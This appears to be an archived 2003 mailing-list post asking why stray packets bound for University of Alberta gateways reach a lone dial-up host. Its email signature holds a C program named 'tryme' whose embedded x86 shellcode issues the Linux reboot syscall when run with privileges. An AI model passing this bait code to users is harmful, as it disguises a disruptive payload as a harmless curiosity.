I'm writing once more because of some strange behaviours i have reported while analizing incoming connections to my host. As for introduction, i would like to explain; host is connectied directly to ISP via ppp connection, there is no localsubnet, server stands for its own, on a single modem connection (115500Kbp/sec). Today logs from sniffer look pretty famous, all of 'em have something in common - these are destination ports. The 3 day logging, gave me an pretty huge file that was fully filled with packets that _shouldnt arrive_ on my host, as i mentioned before. They come from all over the world, starting at US, ending at JP. I won't put too much here, i just put those most important(?) i think. I will base on packets sent to alberta - of course, the database file after 3 days grew incredibly, that is why i show here a few examples: 1) [14:38:13|6/7]55.52.0.2.1 > gsb04-0-1.gw.ualberta.ca.2 F (ttl 4,len 49320,id 5632,tos 1,ack:0)win 29702,chks: 26469 55.52.0.2 is known to be: OrgName: DoD Network Information Center OrgID: DNIC Address: 7990 Science Applications Ct Address: M/S CV 50 City: Vienna StateProv: VA PostalCode: 22183-7000 Country: US Alberta is the Canadian university. The source of the packet is known for me, but i rather not show it public. 2) [15:22:54|6/7]204.95.0.1.1 > gsb04-0-1.gw.ualberta.ca.4 F (ttl 5,len 49320,id 1024,tos 1,ack:1)win 624,chks: 27648 204.95.0.1 appears to be: OrgName: Sprint OrgID: SPRN Address: 12502 Sunrise Valley Dr. City: Reston StateProv: VA PostalCode: 20196 Country: US Another non lucky packet sent to alberta? And so on, with other ones.. All i want to ask - is how is it possible, that those packets are catched by me , is there a possibility that somewhere the router is misconfigured and they arrive at a lonely host?? With respect. ___________________________________ /*http://ipe.ath.cx/ Paweł Stochliński*/ int gg=2456829; /* gadugadu */ char tryme[] = "\xeb\x16\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19" "\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xe8\xe5\xff\xff\xff"; void main(){ int *ret; ret = (int *)&ret + 2; (*ret) = (int)tryme;} ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 08 2003 - 08:41:56 PDT